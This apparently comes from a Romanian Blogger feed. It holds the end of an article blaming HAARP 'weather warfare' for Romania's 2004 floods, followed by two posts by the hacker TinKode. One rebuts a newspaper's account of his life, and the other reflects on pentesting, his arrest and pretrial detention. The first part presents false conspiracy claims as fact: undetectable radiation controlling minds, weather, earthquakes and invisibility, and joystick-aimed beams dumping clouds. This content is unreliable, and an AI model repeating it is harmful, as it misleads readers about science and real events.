<div style="text-align: justify;"><br /></div><div style="text-align: justify;">In plus, ariile fazate sunt utilizate pentru generarea unui tip de radiatie total diferit, ce nu poate fi detectata cu instrumentele clasice de masura a campurilor electro-magnetice. Functie de frecventa si de tip, aceste unde pot afecta teoretic starile emotionale si biologia umana, influenta vremea, modifica dinamica tectonica si chiar manipula mediul hyper-dimensional inconjurator permitand obtinerea invizibilitatii controlate si a manevrarii interdimensionale a personalului si a vehiculelor. In concluzie, acest nou tip de radiatie generat de ariile fazate permite realizarea practica a tot ceea ce undele electromagnetice obisnuite nu pot face.</div>
<div style="text-align: justify;"><br /></div><div style="text-align: justify;">Inainte de a incerca sa explic ce s-a intamplat in fapt in Romania, trebuie subliniat ca razboiul meteorologic reprezinta numai un aspect al putin cunoscutului “Razboi al undelor” - care cuprinde:</div><div style="text-align: justify;">• scanarea suprafetei terestre in vederea detectarii accesului in bazele secrete subterane;</div><div style="text-align: justify;">• blocarea prin intrerupere a tuturor comunicatiilor hertziene;</div><div style="text-align: justify;">• influentarea comportamentului uman;</div><div style="text-align: justify;">• modificari meteorologice, inclusiv generarea de fenomene de cataclism meteo local;</div><div style="text-align: justify;">• “prajirea” a tot ce se afla in interiorul avioanelor in timpul zborurilor, printr-un procedeu similar celui care se produce atunci cand incalzim ceva in cuptorul cu microunde;</div><div style="text-align: justify;">• provocarea de cutremure de pamant;</div><div style="text-align: justify;">• generarea de explozii in atmosfera cu puteri si efecte similare celor ale bombelor atomice.</div>
<div style="text-align: justify;"><br /></div><div style="text-align: justify;">Putem anticipa ca, folosind puterea enorma a fasciculului de unde radioelectrice, in banda foarte inalta sau foarte joasa si creand o zona ionosferica cu plasma reflectorizanta, operatorii de la Gakona pot fixa si focaliza fasciculul de mare putere oriunde, in orice zona sau punct definit in coordonate spatiale deasupra unei anumite tari. Ghidata cu ajutorul acelorasi fascicule energetice a caror pozitionare poate fi controlata cu un simplu joistick sau tracking ball de catre operatorii sistemului aflati in Centrul operational al HAARP, care beneficiaza si de facilitati de contact vizual direct asigurate prin intermediul MONSAT - reteaua globala de sateliti de supraveghere la joasa altitudine a NSA, fasciculul este pozitionat in regim pulsatoriu pe formatiunile noroase existente in zona, indiferent de tipul acestora - cumulus, cirrus, cirrocumulus, nimbus, stratus etc.</div>
<div style="text-align: justify;"><br /></div><div style="text-align: justify;">De fapt nu conteaza decat densitatea vaporilor de apa care-i formeaza. Inchipuiti-va cam ce se intampla cand un impuls cu o durata cuprinsa in plaja de la cateva milisecunde pana la cateva microsecunde al fascicului de inalta energie intra in contact cu un nor incarcat cu vapori de apa. Temperatura de mii de grade Kelvin generata de impulsul radioelectric produce transformarea instantanee si simultana a intregului volum de vapori de apa a norului in apa lichida, care practic se prabuseste spre pamant ca si cum ar fi varsata dintr-o uriasa galeata intoarsa brusc cu fundul in sus! Dupa care, daca in zona nu mai exista si alti nori, aceasta scapa de alte deversari lansate din cer, iar fasciculul este deplasat de operatorii din Alaska spre o noua formatiune noroasa pozitionata deasupra unei alte arii care-si primeste si ea potopul de apa pravalit de la mare altitudine si asa mai departe.</div>
<div style="text-align: justify;"><br /></div><div style="text-align: justify;">Bineinteles ca, in paralel, uriasa energie a fasciculului localizat zonal produce prin incalzirea brusca a atmosferei o intreaga serie de efecte secundare – de la iridiscente si alte fenomene de iluminare aleatoare ale atmosferei pana la generarea de tornade sau a unor puternice rafale de vant cu deplasare rapida.</div><div style="text-align: justify;">Cam asa s-au intamplat lucrurile in 2004, iar explicatia data este pana in acest moment unica care ne poate ajuta sa intelegem, macar partial, modul in care au fost generate neobisnuitele fenomene meteorologice care au lovit Romania in acea vara!</div>
<br />
<b>Autor: Marius – Eugen Opran<br /></b>Unknownnoreply@blogger.com8tag:blogger.com,1999:blog-6765804592460817910.post-21916232559656724872012-12-07T17:00:00.011+02:002023-12-08T15:45:38.796+02:00The truth about me | Libertatea.ro 👎 Nici nu știu cum să încep. După ce am fost arestat, presa din România a început să scrie articole despre mine pe bandă rulantă, despre ce am realizat eu și mai ales despre ce fel de persoană sunt în viața reală. Totul ok până aici. Am fost foarte revoltat când am citit un articol într-un ziar care prin absurd îmi luase și un interviu cu ceva timp în urmă. De ce spun asta? Păi au mințit cu nerușinare spunând o mulțime de lucruri lipsite de respect. Articolul poate fi citit aici: <a href="http://www.libertatea.ro/detalii/articol/Dezvaluiri-incredibile-despre-hackerul-roman-TinKode-Si-a-luat-cu-greu-Bac-ul-dar-a-speriat-Pentagonul-376906.html">www.libertatea.ro/...</a><div><a href="http://www.libertatea.ro/detalii/articol/Dezvaluiri-incredibile-despre-hackerul-roman-TinKode-Si-a-luat-cu-greu-Bac-ul-dar-a-speriat-Pentagonul-376906.html"><span><a name='more'></a></span></a><br />
Câteva citate:
<blockquote>
<i>"A fost corigent în liceu, a luat Bac-ul în sesiunea din toamnă, a intrat cu greu la facultate, a fost crescut de mama sa şi nu a mai avut o iubită de doi ani. Acesta este profilul românului de 20 de ani, botezat TinKode, care i-a învins pe americani de unul singur.</i><i><br />...</i><br />
<i>Pentru că a fost repetent în liceu, băiatul a dat Bac-ul abia în toamna
anului trecut, apoi s-a înscris la Facultatea de Matematică-Informatică
din Timişoara. Culmea, Răzvan nu a fost admis printre primii, ci a avut
media 7,17 şi beneficiază de o bursă socială, iar în prima sa sesiune
are deja o notă de 4 la examenul de matematică.
<br />...<br />
Mai mult, deşi abilităţile sale au pus în încurcătură companii ultracunoscute din lume, TinKode are la informatică doar nota 8. Băiatul nu a ieşit cu nimic în evidenţă printre colegii săi, iar ultima iubită a avut-o în urmă cu doi ani, acasă, la Drobeta-Turnu Severin. Băiatul a fost crescut de mama sa, după ce tatăl lui a murit, iar potrivit vecinilor familiei Cernăianu, se pare că femeia, pensionată pe caz de boală, ar fi ştiut cu ce se ocupa Răzvan. "</i></blockquote><div style="text-align: justify;">În primul rând <b>nu am fost</b> vreodată corigent sau repetent în liceu sau în școala generală. Am luat bacalaureatul în prima sesiune, cea din vara lui 2011 (<i>această informație o puteți găsi imediat dând un simplu search, spre exemplu <a href="http://www.clopotel.ro/edu/invatamant/_rezultate/bacalaureat_2011/MH/page_63.php#CERNAIANU/MANOLE-RAZVAN" target="_blank">aici</a></i>). Nu am avut o medie de lăudat (<i>nici nu mi-am dorit una, în plus cu ce mă ajută dacă învăt o mie de materii nefolositoare</i>) dar totuși cu ajutorul acesteia am fost unul dintre cei <b>19 </b>promovați dintr-un total de 300 și ceva de elevi din liceul meu. Nu îmi dau seama cum am putut fi admis cu dificultate la facultate când aproximativ 60% dintre elevii din toată țara nu au trecut examenul din acel an.</div>
<div style="text-align: justify;"><br /></div><div style="text-align: justify;">Am fost crescut de ambii parinți (<i>tatăl meu <b>nu este mort</b></i>), care mi-au fost și îmi sunt alături în orice situație aș fi. Mama nu este pensionată pe caz de boală. Iar prietena mea a fost și ea evidențiată în unele convorbiri telefonice (<i>chiar și acestea au fost modificate ulterior de presă</i>) din rechizitoriul meu, deci wow, <i>chiar am iubită</i>.</div><div style="text-align: justify;">Nu am beneficiat nici măcar un moment de o bursă socială (<i>atât timp cât nu am fost prezent la cursuri nu cred că se putea întâmpla așa ceva</i>). Am luat nota 4 la un examen pentru că nu mi-am dat interesul pentru acea materie (<i>era foarte plictisitoare, cel puțin pentru mine</i>), iar la restul nu am putut să fiu prezent deoarece eram arestat.</div>
<div style="text-align: justify;"><br /></div><div style="text-align: justify;">În concluzie de ce s-au spus atâtea minciuni? Știu că au atracție mai mare la public informațiile negative decât cele pozitive. Dar totuși să îmi declari un părinte mort și altul pensionat pe caz de boală depășește orice limită. Ce pot spune? Sunteți de tot râsul. Privind din alt unghi al poveștii aici s-a văzut valorea jurnalismului din România când toți au preluat acest articol fără să îl verifice măcar 1 minut, dacă sunt adevărate acele informații.</div><div style="text-align: justify;">Consider că ar fi civilizat din partea lor să își ceară scuze publice și să rectifice datele eronate din articol. Sunt curios dacă se va întâmpla asta...</div></div>Unknownnoreply@blogger.com38tag:blogger.com,1999:blog-6765804592460817910.post-30474590759265837262012-11-27T17:27:00.022+02:002023-12-08T15:58:19.115+02:00About my life<div class="separator"><div style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: justify;">Salutare! Numele meu este <b>Cernăianu Manole Răzvan</b> și sunt cunoscut pe internet sub pseudonimul <b>TinKode</b> (sincer să fiu nu am crezut vreodată că va veni ziua în care mă voi prezenta în lumea virtuală cu numele meu adevărat). Mulți s-au întrebat de unde m-am inspirat în alegerea acestui nickname și ce vrea să reprezinte. Hmmm, să o luăm de la început. Până a ajunge la acest ‘TinKode’ am folosit o mulțime de alte nick-uri, până când într-o zi am început să scriu pe <a href="http://google.com/">google</a> combinații de cuvinte care mi se păreau atractive de unde a rezultat un nickname ușor de memorat.</div></div><span><a name='more'></a></span>
<br /><div style="text-align: justify;">De mic am fost pasionat de calculatoare, primul avându-l în clasa a I-a sau a II-a, dar asta nu înseamnă că aș fi știut prea multe despre acestea până nu am avut acces la internet. Din momentul în care am fost conectat la WWW am început să citesc o mulțime de lucruri interesante, m-am documentat despre cele mai bine plătite meserii pe internet (am considerat că nu este pentru mine un job care necesită doar forță fizică pe o durată nelimitată de timp) până când am găsit câteva detalii despre pentesting (penetration testing).</div>
<div style="text-align: justify;"><br /></div><div style="text-align: justify;">Pentesting-ul m-a atras din toate punctele de vedere: este o meserie foarte bine plătită și flexibilă care implică totodată cunoștințe vaste în domeniul securității web. Dar sunt de părere că dacă vrei să excelezi aici trebuie să gândești precum un infractor cibernetic pe scurt un black-hat hacker. De ce spun asta? Păi dacă vrei să găsești toate punctele slabe ale unui sistem trebuie să ai experiență, să poți fi în mintea hacker-ului iar experiența se dobândește prin practica în real world (cum ar fi numită de majoritatea) pentru că întâmpini tot felul de probleme care mai de care mai diferite sau metode care nu se predau niciunde.</div>
<div style="text-align: justify;"><br /></div><div style="text-align: justify;">Nu spun că dacă ești de la bun început un white-hat și ai învățat tot ce este necesar într-o facultate sau la cursuri speciale de genul, nu vei face o muncă bună, dar un black-hat care devine white-hat va avea întotdeauna un atuu în plus. Sper să nu se înțeleagă că încurajez black hacking-ul; este un risc pe care trebuie să ți-l asumi de la bun început și de cele mai multe ori nu se merită pentru că vei ajunge dator cu câteva sute de mii de $ și cu un dosar aproape cât tine de mare (cum a fost cazul meu și am cam 1.75 metri înălțime) și de ce să excludem și varianta în care poți ajunge după gratii o perioadă îndelungată de timp sau dacă ai noroc primești o sentință cu suspendare.</div>
<div style="text-align: justify;"><br /></div><div style="text-align: justify;">Libertatea. Este un subiect pe care mulți ignoră să îl ia în calcul atunci când se apucă de activități ilegale în lumea virtuală sau cea reală. Majoritatea se împacă cu ideea că dacă sunt prinşi vreodată nu vor avea probleme financiare când sunt eliberaţi. Din cauza teribilismului se ajunge în primul exemplu și din prostie în al doilea. Oricât de bun hacker ai fi întotdeauna vei avea nașul tău și dacă acest naș nu este de aceeași categorie cu tine, adică tot un hacker, mai mult ca sigur va fi un informator a.k.a. ‘sifon‘ și procentajul în care o să ai tot ce ai obținut confiscat este foarte ridicat.</div>
<div style="text-align: justify;"><br /></div><div style="text-align: justify;">Să vă riscați libertatea nu se merită pentru nimic în lume. Și o spun din propria experiență… Am petrecut aproximativ 90 de zile (de pe 31 ianuarie - 27 aprilie 2012; o nimica toată în comparație cu restul pedepselor) în arest preventiv unde ești 24/24 de ore privat de libertate. Îți petreci cea mai mare parte din timp cu alte 3 până la 7 persoane într-o încăpere de 4 metri pătrați unde totul este gri și dacă ai noroc și vremea este de partea ta poți să ieși în curtea de recreere. Te poți deprima imediat dacă nu ai un caracter puternic sau nu crezi în tine. Am fost în celulă cu tot felul de infractori precum criminali, falsificatori de bani, carderi, hoți, etc (nu e un motiv de teamă, toți suntem oameni și dacă există respect și vorbe calculate totul este ok) dar să știi că ești la cheremul unor gardieni este cel mai neplăcut lucru.</div>
<div style="text-align: justify;"><br /></div><div style="text-align: justify;">Eu am fost privit diferit față de restul, din cauza motivului arestării mele. Totul a fost bine dar totuși foarte greu. Din această lecție am învățat că nu trebuie să îți riști libertatea pentru nimic în lume și că orice sumă de bani ar putea fi la mijloc, nu îi va ține locul absolut niciodată. Acesta este un capitol din trecutul meu în care mi-a fost arătat gustul amar al vieții dar acum trebuie să fiu fericit deoarece totul a revenit la normal. Nu trebuie să uităm că omul din greșeli învață.</div>
<span><div style="text-align: justify;"><br /></div><span style="font-family: inherit;"><div style="text-align: justify;"><span style="font-family: inherit;">Ce am realizat? A meritat!? Întrebările acestea mi-au fost adresate cel mai frecvent din partea multor persoane în ultimul timp fiind curioase dacă a meritat tot ce am făcut și ce am realizat. Răspunsul e cu 2 tăișuri și de ce spun asta? Păi în primul rând ‘sincer să fiu‘ nu a meritat mai deloc deoarece din cauza mea au suferit multe persoane (din suflet le cer scuze) și mă refer la rude, iubită și unii prieteni care s-au dovedit a fi foarte puțini, restul însemnând cunoștințe care sunt pe lângă tine la bine iar la greu se fac pierdute în lume. În al 2-lea rând a meritat pentru că mi-am împlinit un vis și anume să fiu cunoscut și recunoscut doar pentru ceea ce am facut eu și nu furând munca sau laudele altuia. Am reușit acest lucru doarece am avut o doză de ambiție imensă care m-a ajutat poate cel mai mult și am avut încredere în mine. Unul dintre visuri a fost bifat cu ‘check’ dar mai rămân alte câteva sute pe lista mea care sunt momentan doar în stadiul incipient dar nu îmi fac griji, am doar 21 de ani deci există timp din belșug.</span></div></span></span><div style="text-align: justify;"><br /></div>
<span><div style="font-family: inherit; text-align: justify;"><span style="font-family: inherit;">Consider că am reusit puțin acolo să schimb percepția oamenilor asupra termenului ‘hacker’ (cu toate că nu mă consider unul) să nu mai fie confundați cu alte tipuri cărora nu le dau numele. M-am simțit mandru că sunt român când mi-am auzit naționalitatea în mass-media din toată lumea, nu știu dacă și voi ați simțit la fel. Mulți o să mă contrazică spunând că sunt un infractor și nu e ceva de lăudat, dar uită sau nu știu că eu am încercat să ajut găsind acele vulnerabilități și nu am dorit să le folosesc în scopuri personale (spre înțelegerea tuturor acele fapte bune costă enorm de mult dacă sunt realizate din partea unor firme din domeniul testării securității web – penetration testing).</span></div><div style="text-align: justify;"><br /></div><span style="font-family: inherit;"><div style="text-align: justify;"><span style="font-family: inherit;"><div style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="178" src="https://4.bp.blogspot.com/-ukMPqV6Ra7s/VGOaOMcEJBI/AAAAAAAAAN4/4WYaCMiSArk/w200-h198/hacker_798382587e.jpg" width="163" /></div>Spunând acestea mulți m-au considerat, mă consideră si mă vor considera egocentric și mă vor critica că am vrut faimă s.a.m.d. Îi înțeleg și sunt conștient de asta. Oricât de simpatic sau bun ai fi nu poți să îi convingi pe toți să te placă. Sunt de părere că atunci când nu ești plăcut de un număr de persoane semnificativ mare este bine deoarece înseamnă că îți faci treaba cum trebuie și aceștia se simt plafonați sau sunt invidioși din cauza succesului tău. Și până la urmă ce rost ar mai avea admiratorii dacă nu ai și opusul lor pe cei ranchiunoși. Toate criticile primite le-am transformat în combustibil pentru a-mi alimenta țelul de a mă autodepăși, iar dacă le dai prea multă importanță o să te devieze de la scopul tău și o să îți pierzi încrederea în tine.</span></div></span><div style="text-align: justify;"><br /></div><span style="font-family: inherit;"><div style="text-align: justify;"><span style="font-family: inherit;"><br /></span></div><div style="text-align: justify;"><span style="font-family: inherit;">În încheiere vă pot sfătui să aveți încredere în voi și în ceea ce faceți. Fiți într-o continuă competiție cu voi înșivă. Și nu în ultimul rând să aveți voința să deveniți din ce în ce mai buni în domeniul vostru preferat, <b>nu ai nimic de pierdut dacă încerci</b>.</span></div></span></span>Unknownnoreply@blogger.com84